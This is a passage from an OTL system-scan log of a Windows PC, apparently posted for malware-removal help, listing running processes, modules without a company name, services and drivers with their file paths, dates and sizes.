PRC - [2012.05.24 14:15:07 | 002,686,976 | ---- | M] () -- D:\Spiele\League of Legends\RADS\projects\lol_launcher\releases\0.0.0.164\deploy\LoLLauncher.exe

PRC - [2012.05.15 15:17:26 | 000,363,800 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe

PRC - [2012.05.15 15:17:22 | 000,277,784 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe

PRC - [2012.05.10 15:20:34 | 000,165,144 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe

PRC - [2012.03.27 01:14:28 | 000,291,608 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe

PRC - [2011.11.22 16:31:38 | 000,374,112 | ---- | M] (Ralink Technology, Corp.) -- C:\Program Files (x86)\Belkin\F9L1103\v1\Common\RaRegistry.exe

PRC - [2011.10.29 01:47:48 | 001,294,336 | ---- | M] () -- D:\Spiele\League of Legends\RADS\system\rads_user_kernel.exe

PRC - [2010.06.14 14:56:02 | 004,573,664 | ---- | M] () -- C:\Program Files (x86)\NETGEAR\WNA1100\WNA1100.exe

PRC - [2010.03.22 20:07:22 | 000,268,768 | ---- | M] () -- C:\Program Files (x86)\NETGEAR\WNA1100\WifiSvc.exe

 

 
 ========== Modules (No Company Name) ==========

 

MOD - [2013.06.11 15:13:39 | 001,175,040 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\wx._core_.pyd

MOD - [2013.06.11 15:13:39 | 001,153,024 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\_ssl.pyd

MOD - [2013.06.11 15:13:39 | 001,022,416 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\windows._cacheinvalidation.pyd

MOD - [2013.06.11 15:13:39 | 000,811,008 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\wx._windows_.pyd

MOD - [2013.06.11 15:13:39 | 000,805,888 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\wx._gdi_.pyd

MOD - [2013.06.11 15:13:39 | 000,735,232 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\wx._misc_.pyd

MOD - [2013.06.11 15:13:39 | 000,711,680 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\_hashlib.pyd

MOD - [2013.06.11 15:13:39 | 000,557,056 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\pysqlite2._sqlite.pyd

MOD - [2013.06.11 15:13:39 | 000,364,544 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\pythoncom27.dll

MOD - [2013.06.11 15:13:39 | 000,320,512 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\win32com.shell.shell.pyd

MOD - [2013.06.11 15:13:39 | 000,128,512 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\_elementtree.pyd

MOD - [2013.06.11 15:13:39 | 000,122,368 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\wx._wizard.pyd

MOD - [2013.06.11 15:13:39 | 000,119,808 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\win32file.pyd

MOD - [2013.06.11 15:13:39 | 000,110,080 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\pywintypes27.dll

MOD - [2013.06.11 15:13:39 | 000,108,544 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\win32security.pyd

MOD - [2013.06.11 15:13:39 | 000,098,816 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\win32api.pyd

MOD - [2013.06.11 15:13:39 | 000,087,040 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\_ctypes.pyd

MOD - [2013.06.11 15:13:39 | 000,070,656 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\wx._html2.pyd

MOD - [2013.06.11 15:13:39 | 000,044,032 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\_socket.pyd

MOD - [2013.06.11 15:13:39 | 000,038,912 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\win32inet.pyd

MOD - [2013.06.11 15:13:39 | 000,035,840 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\win32process.pyd

MOD - [2013.06.11 15:13:39 | 000,026,624 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\_multiprocessing.pyd

MOD - [2013.06.11 15:13:39 | 000,025,600 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\win32pdh.pyd

MOD - [2013.06.11 15:13:39 | 000,022,528 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\win32ts.pyd

MOD - [2013.06.11 15:13:39 | 000,017,408 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\win32profile.pyd

MOD - [2013.06.11 15:13:39 | 000,011,264 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\win32crypt.pyd

MOD - [2013.06.11 15:13:38 | 001,062,400 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\wx._controls_.pyd

MOD - [2013.06.11 15:13:38 | 000,686,080 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\unicodedata.pyd

MOD - [2013.06.11 15:13:38 | 000,127,488 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\pyexpat.pyd

MOD - [2013.06.11 15:13:38 | 000,018,432 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\win32event.pyd

MOD - [2013.06.11 15:13:38 | 000,010,240 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\select.pyd

MOD - [2013.05.23 18:35:10 | 003,128,728 | ---- | M] () -- C:\Program Files (x86)\Mozilla Firefox\mozjs.dll

MOD - [2013.05.14 20:09:30 | 016,033,160 | ---- | M] () -- C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_7_700_202.dll

MOD - [2013.03.02 20:38:20 | 000,623,616 | ---- | M] () -- C:\Program Files (x86)\Winamp\System\jnetlib.w5s

MOD - [2013.03.02 20:38:20 | 000,154,624 | ---- | M] () -- C:\Program Files (x86)\Winamp\System\jpeg.w5s

MOD - [2013.03.02 20:38:20 | 000,091,136 | ---- | M] () -- C:\Program Files (x86)\Winamp\System\xml.w5s

MOD - [2013.03.02 20:38:20 | 000,087,552 | ---- | M] () -- C:\Program Files (x86)\Winamp\System\png.w5s

MOD - [2013.03.02 20:38:20 | 000,084,480 | ---- | M] () -- C:\Program Files (x86)\Winamp\System\playlist.w5s

MOD - [2013.03.02 20:38:20 | 000,083,968 | ---- | M] () -- C:\Program Files (x86)\Winamp\tataki.dll

MOD - [2013.03.02 20:38:20 | 000,064,512 | ---- | M] () -- C:\Program Files (x86)\Winamp\zlib.dll

MOD - [2013.03.02 20:38:20 | 000,035,328 | ---- | M] () -- C:\Program Files (x86)\Winamp\System\timer.w5s

MOD - [2013.03.02 20:38:20 | 000,021,504 | ---- | M] () -- C:\Program Files (x86)\Winamp\System\tagz.w5s

MOD - [2013.03.02 20:38:20 | 000,013,824 | ---- | M] () -- C:\Program Files (x86)\Winamp\System\primo.w5s

MOD - [2013.03.02 20:38:19 | 001,737,728 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\gen_ff.dll

MOD - [2013.03.02 20:38:19 | 000,417,280 | ---- | M] () -- C:\Program Files (x86)\Winamp\nsutil.dll

MOD - [2013.03.02 20:38:19 | 000,340,992 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\freeform\wacs\freetype\freetype.wac

MOD - [2013.03.02 20:38:19 | 000,318,976 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\gen_ml.dll

MOD - [2013.03.02 20:38:19 | 000,313,344 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\in_wm.dll

MOD - [2013.03.02 20:38:19 | 000,294,912 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\ml_local.dll

MOD - [2013.03.02 20:38:19 | 000,290,816 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\in_mp3.dll

MOD - [2013.03.02 20:38:19 | 000,253,440 | ---- | M] () -- C:\Program Files (x86)\Winamp\libsndfile.dll

MOD - [2013.03.02 20:38:19 | 000,253,440 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\in_vorbis.dll

MOD - [2013.03.02 20:38:19 | 000,249,856 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\ml_devices.dll

MOD - [2013.03.02 20:38:19 | 000,240,640 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\ml_pmp.dll

MOD - [2013.03.02 20:38:19 | 000,201,728 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\ml_disc.dll

MOD - [2013.03.02 20:38:19 | 000,185,344 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\gen_jumpex.dll

MOD - [2013.03.02 20:38:19 | 000,174,080 | ---- | M] () -- C:\Program Files (x86)\Winamp\System\auth.w5s

MOD - [2013.03.02 20:38:19 | 000,164,864 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\in_mod.dll

MOD - [2013.03.02 20:38:19 | 000,124,928 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\ml_online.dll

MOD - [2013.03.02 20:38:19 | 000,118,272 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\pmp_p4s.dll

MOD - [2013.03.02 20:38:19 | 000,113,664 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\pmp_wifi.dll

MOD - [2013.03.02 20:38:19 | 000,109,568 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\in_midi.dll

MOD - [2013.03.02 20:38:19 | 000,102,400 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\in_cdda.dll

MOD - [2013.03.02 20:38:19 | 000,084,480 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\ml_playlists.dll

MOD - [2013.03.02 20:38:19 | 000,083,456 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\ml_plg.dll

MOD - [2013.03.02 20:38:19 | 000,078,848 | ---- | M] () -- C:\Program Files (x86)\Winamp\nde.dll

MOD - [2013.03.02 20:38:19 | 000,075,264 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\in_nsv.dll

MOD - [2013.03.02 20:38:19 | 000,072,192 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\in_dshow.dll

MOD - [2013.03.02 20:38:19 | 000,068,608 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\in_avi.dll

MOD - [2013.03.02 20:38:19 | 000,061,440 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\in_flac.dll

MOD - [2013.03.02 20:38:19 | 000,060,928 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\pmp_android.dll

MOD - [2013.03.02 20:38:19 | 000,057,344 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\ml_impex.dll

MOD - [2013.03.02 20:38:19 | 000,057,344 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\gen_orgler.dll

MOD - [2013.03.02 20:38:19 | 000,053,760 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\pmp_usb.dll

MOD - [2013.03.02 20:38:19 | 000,052,736 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\in_mp4.dll

MOD - [2013.03.02 20:38:19 | 000,052,224 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\out_ds.dll

MOD - [2013.03.02 20:38:19 | 000,052,224 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\ml_history.dll

MOD - [2013.03.02 20:38:19 | 000,049,152 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\in_mkv.dll

MOD - [2013.03.02 20:38:19 | 000,044,544 | ---- | M] () -- C:\Program Files (x86)\Winamp\System\devices.w5s

MOD - [2013.03.02 20:38:19 | 000,043,008 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\in_flv.dll

MOD - [2013.03.02 20:38:19 | 000,033,792 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\ml_rg.dll

MOD - [2013.03.02 20:38:19 | 000,032,256 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\ml_transcode.dll

MOD - [2013.03.02 20:38:19 | 000,028,672 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\ml_bookmarks.dll

MOD - [2013.03.02 20:38:19 | 000,028,672 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\ml_autotag.dll

MOD - [2013.03.02 20:38:19 | 000,028,160 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\gen_hotkeys.dll

MOD - [2013.03.02 20:38:19 | 000,025,600 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\gen_tray.dll

MOD - [2013.03.02 20:38:19 | 000,023,552 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\in_swf.dll

MOD - [2013.03.02 20:38:19 | 000,023,552 | ---- | M] () -- C:\Program Files (x86)\Winamp\System\albumart.w5s

MOD - [2013.03.02 20:38:19 | 000,022,528 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\out_disk.dll

MOD - [2013.03.02 20:38:19 | 000,020,480 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\pmp_njb.dll

MOD - [2013.03.02 20:38:19 | 000,019,456 | ---- | M] () -- C:\Program Files (x86)\Winamp\System\gif.w5s

MOD - [2013.03.02 20:38:19 | 000,019,456 | ---- | M] () -- C:\Program Files (x86)\Winamp\System\bmp.w5s

MOD - [2013.03.02 20:38:19 | 000,018,432 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\out_wave.dll

MOD - [2013.03.02 20:38:19 | 000,016,896 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\in_wave.dll

MOD - [2013.03.02 20:38:19 | 000,016,896 | ---- | M] () -- C:\Program Files (x86)\Winamp\System\dlmgr.w5s

MOD - [2013.03.02 20:38:19 | 000,016,384 | ---- | M] () -- C:\Program Files (x86)\Winamp\System\gracenote.w5s

MOD - [2013.03.02 20:38:19 | 000,014,336 | ---- | M] () -- C:\Program Files (x86)\Winamp\System\filereader.w5s

MOD - [2013.03.02 20:38:19 | 000,007,168 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\in_linein.dll

MOD - [2013.01.15 01:00:00 | 000,187,392 | ---- | M] () -- C:\Program Files (x86)\Trillian\libpng15.dll

MOD - [2013.01.15 01:00:00 | 000,065,536 | ---- | M] () -- C:\Program Files (x86)\Trillian\libungif.dll

MOD - [2013.01.15 01:00:00 | 000,059,904 | ---- | M] () -- C:\Program Files (x86)\Trillian\zlib1.dll

MOD - [2013.01.15 01:00:00 | 000,010,752 | ---- | M] () -- c:\program files (x86)\trillian\languages\en\buddy.dll

MOD - [2013.01.15 01:00:00 | 000,007,168 | ---- | M] () -- c:\program files (x86)\trillian\languages\en\talk.dll

MOD - [2013.01.15 01:00:00 | 000,006,656 | ---- | M] () -- c:\program files (x86)\trillian\languages\en\trillian.dll

MOD - [2013.01.15 01:00:00 | 000,006,656 | ---- | M] () -- c:\program files (x86)\trillian\languages\en\events.dll

MOD - [2013.01.15 01:00:00 | 000,003,584 | ---- | M] () -- c:\program files (x86)\trillian\languages\en\toolkit.dll

MOD - [2012.05.24 14:15:07 | 002,686,976 | ---- | M] () -- D:\Spiele\League of Legends\RADS\projects\lol_launcher\releases\0.0.0.164\deploy\LoLLauncher.exe

MOD - [2011.10.29 01:47:48 | 001,294,336 | ---- | M] () -- D:\Spiele\League of Legends\RADS\system\rads_user_kernel.exe

MOD - [2010.12.13 12:06:26 | 000,638,976 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\ml_ipod.dll

MOD - [2010.12.13 12:03:34 | 000,069,632 | ---- | M] () -- C:\Program Files (x86)\Winamp\plugins\ml_ipod\ui.dll

MOD - [2010.06.14 14:56:02 | 004,573,664 | ---- | M] () -- C:\Program Files (x86)\NETGEAR\WNA1100\WNA1100.exe

MOD - [2009.08.28 16:50:18 | 000,282,624 | ---- | M] () -- C:\Program Files (x86)\NETGEAR\WNA1100\WifiSvcLib.dll

 

 
 ========== Services (SafeList) ==========

 

SRV:64bit: - [2009.07.14 03:40:01 | 000,193,536 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\appmgmts.dll -- (AppMgmt)

SRV - [2013.06.05 21:29:08 | 000,543,656 | ---- | M] (Valve Corporation) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Steam\SteamService.exe -- (Steam Client Service)

SRV - [2013.05.23 18:35:23 | 000,117,144 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)

SRV - [2013.05.19 17:09:43 | 000,053,248 | ---- | M] () [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\BattlEye\BEService.exe -- (BEService)

SRV - [2013.05.14 20:09:31 | 000,256,904 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)

SRV - [2013.05.11 12:37:26 | 000,065,640 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)

SRV - [2013.03.01 09:45:15 | 001,038,088 | ---- | M] (Acresso Software Inc.) [On_Demand | Stopped] -- C:\Programme\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService64.exe -- (FLEXnet Licensing Service 64)

SRV - [2013.03.01 09:43:53 | 000,655,624 | ---- | M] (Acresso Software Inc.) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe -- (FLEXnet Licensing Service)

SRV - [2013.01.27 12:34:32 | 000,379,360 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Programme\Microsoft Security Client\NisSrv.exe -- (NisSrv)

SRV - [2013.01.27 12:34:32 | 000,022,056 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Programme\Microsoft Security Client\MsMpEng.exe -- (MsMpSvc)

SRV - [2013.01.18 09:14:20 | 000,383,264 | ---- | M] (NVIDIA Corporation) [Auto | Running] -- C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe -- (Stereo Service)

SRV - [2012.12.29 12:34:47 | 001,260,472 | ---- | M] (NVIDIA Corporation) [Auto | Stopped] -- C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe -- (nvUpdatusService)

SRV - [2012.07.25 18:58:26 | 000,126,976 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files (x86)\Windows Kits\8.0\Testing\Runtimes\TAEF\Wex.Services.exe -- (Te.Service)

SRV - [2012.07.25 18:13:16 | 000,139,776 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files (x86)\Windows Kits\8.0\App Certification Kit\fussvc.exe -- (fussvc)

SRV - [2012.07.09 00:40:10 | 000,104,912 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -- (clr_optimization_v4.0.30319_32)

SRV - [2012.05.15 15:17:26 | 000,363,800 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe -- (UNS)

SRV - [2012.05.15 15:17:22 | 000,277,784 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe -- (LMS)

SRV - [2012.05.10 15:20:34 | 000,165,144 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe -- (jhi_service)

SRV - [2012.04.20 14:16:12 | 000,635,104 | ---- | M] (Intel(R) Corporation) [Auto | Running] -- C:\Programme\Intel\iCLS Client\HeciServer.exe -- (Intel(R)

SRV - [2012.02.11 08:55:04 | 000,129,624 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Programme\Microsoft SQL Server\90\Shared\sqlwriter.exe -- (SQLWriter)

SRV - [2011.11.22 16:31:38 | 000,451,936 | ---- | M] (Ralink Technology, Corp.) [Auto | Running] -- C:\Program Files (x86)\Belkin\F9L1103\v1\Common\RaRegistry64.exe -- (RalinkRegistryWriter64)

SRV - [2011.11.22 16:31:38 | 000,374,112 | ---- | M] (Ralink Technology, Corp.) [Auto | Running] -- C:\Program Files (x86)\Belkin\F9L1103\v1\Common\RaRegistry.exe -- (RalinkRegistryWriter)

SRV - [2011.03.21 17:19:16 | 001,845,248 | ---- | M] (Locktime Software) [Auto | Running] -- C:\Programme\NetLimiter 3\nlsvc.exe -- (nlsvc)

SRV - [2010.03.22 20:07:22 | 000,268,768 | ---- | M] () [Auto | Running] -- C:\Program Files (x86)\NETGEAR\WNA1100\WifiSvc.exe -- (WSWNA1100)

SRV - [2010.03.22 20:05:40 | 000,960,992 | ---- | M] (Atheros Communications, Inc.) [On_Demand | Stopped] -- C:\Program Files (x86)\NETGEAR\WNA1100\jswpsapi.exe -- (jswpsapi)

SRV - [2009.06.10 23:23:09 | 000,066,384 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe -- (clr_optimization_v2.0.50727_32)

 

 
 ========== Driver Services (SafeList) ==========

 

DRV:64bit: - [2013.04.05 20:27:19 | 000,564,824 | ---- | M] (Duplex Secure Ltd.) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\sptd.sys -- (sptd)

DRV:64bit: - [2013.01.20 16:59:04 | 000,130,008 | ---- | M] (Microsoft Corporation) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\NisDrvWFP.sys -- (NisDrv)

DRV:64bit: - [2012.12.13 14:50:36 | 000,054,784 | ---- | M] (Apple, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\usbaapl64.sys -- (USBAAPL64)

DRV:64bit: - [2012.08.23 16:10:20 | 000,019,456 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\rdpvideominiport.sys -- (RdpVideoMiniport)

DRV:64bit: - [2012.08.23 16:08:26 | 000,030,208 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbGD.sys -- (TsUsbGD)

DRV:64bit: - [2012.08.23 16:07:35 | 000,057,856 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt)

DRV:64bit: - [2012.08.21 19:14:02 | 000,772,224 | ---- | M] (Line 6) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\L6GX64.sys -- (L6GX)

DRV:64bit: - [2012.08.21 14:01:20 | 000,033,240 | ---- | M] (GEAR Software Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\GEARAspiWDM.sys -- (GEARAspiWDM)

DRV:64bit: - [2012.07.17 19:12:08 | 000,062,784 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\HECIx64.sys -- (MEIx64)

DRV:64bit: - [2012.07.03 17:25:16 | 000,189,288 | ---- | M] (NVIDIA Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\nvhda64v.sys -- (NVHDA)

DRV:64bit: - [2012.05.14 08:12:30 | 000,096,896 | ---- | M] (Advanced Micro Devices) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\AtihdW76.sys -- (AtiHDAudioService)

DRV:64bit: - [2012.04.25 09:07:18 | 000,104,560 | ---- | M] (Qualcomm Atheros Co., Ltd.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\L1C62x64.sys -- (L1C)

DRV:64bit: - [2012.03.27 01:13:20 | 000,789,272 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\iusb3xhc.sys -- (iusb3xhc)

DRV:64bit: - [2012.03.27 01:13:20 | 000,356,632 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\iusb3hub.sys -- (iusb3hub)

DRV:64bit: - [2012.03.27 01:13:18 | 000,019,224 | ---- | M] (Intel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\iusb3hcs.sys -- (iusb3hcs)

DRV:64bit: - [2012.03.01 08:46:16 | 000,023,408 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\Windows\SysNative\drivers\fs_rec.sys -- (Fs_Rec)

DRV:64bit: - [2011.12.16 21:17:40 | 001,675,840 | ---- | M] (Ralink Technology Corp.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\netr28ux.sys -- (netr28ux)

DRV:64bit: - [2011.03.21 17:44:30 | 000,033,416 | ---- | M] (Locktime Software) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\nlndis.sys -- (NLNdisPT)

DRV:64bit: - [2011.03.21 17:44:30 | 000,033,416 | ---- | M] (Locktime Software) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\nlndis.sys -- (NLNdisMP)

DRV:64bit: - [2011.03.11 08:41:12 | 000,107,904 | ---- | M] (Advanced Micro Devices) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)

DRV:64bit: - [2011.03.11 08:41:12 | 000,027,008 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)

DRV:64bit: - [2010.11.21 05:23:48 | 000,071,168 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\dmvsc.sys -- (dmvsc)

DRV:64bit: - [2010.11.21 05:23:47 | 000,078,720 | ---- | M] (Hewlett-Packard Company) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)

DRV:64bit: - [2010.03.09 16:33:10 | 001,849,856 | ---- | M] (Atheros Communications, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\athurx.sys -- (athur)

DRV:64bit: - [2009.07.14 03:52:20 | 000,194,128 | ---- | M] (AMD Technologies Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)

DRV:64bit: - [2009.07.14 03:48:04 | 000,065,600 | ---- | M] (LSI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)

DRV:64bit: - [2009.07.14 03:45:55 | 000,024,656 | ---- | M] (Promise Technology) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)

DRV:64bit: - [2009.06.10 22:34:33 | 003,286,016 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)

DRV:64bit: - [2009.06.10 22:34:28 | 000,468,480 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)

DRV:64bit: - [2009.06.10 22:34:23 | 000,270,848 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\b57nd60a.sys -- (b57nd60a)

DRV:64bit: - [2009.06.10 22:31:59 | 000,031,232 | ---- | M] (Hauppauge Computer Works, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hcw85cir.sys -- (hcw85cir)

DRV:64bit: - [2008.06.27 08:51:10 | 000,088,632 | ---- | M] (Adobe Systems, Inc.) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\adfs.sys -- (adfs)

DRV:64bit: - [2008.05.15 02:28:00 | 000,026,624 | ---- | M] (Atheros Communications, Inc.) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\jswpslwfx.sys -- (JSWPSLWF)

DRV:64bit: - [2007.01.19 18:24:24 | 000,025,312 | ---- | M] (Windows (R) Codename Longhorn DDK provider) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\SCMNdisP.sys -- (SCMNdisP)

DRV - [2012.07.13 16:13:14 | 000,070,264 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Program Files (x86)\Microsoft Visual Studio 11.0\Team Tools\Performance Tools\x64\VSPerfDrv110.sys -- (VSPerfDrv110)

DRV - [2011.03.21 17:44:28 | 000,088,200 | ---- | M] (Locktime Software) [Kernel | System | Running] -- C:\Programme\NetLimiter 3\nltdi.sys -- (nltdi)

DRV - [2009.07.14 03:19:10 | 000,019,008 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysWOW64\drivers\wimmount.sys -- (WIMMount)

 

 
 ========== Standard Registry (SafeList) ==========

 

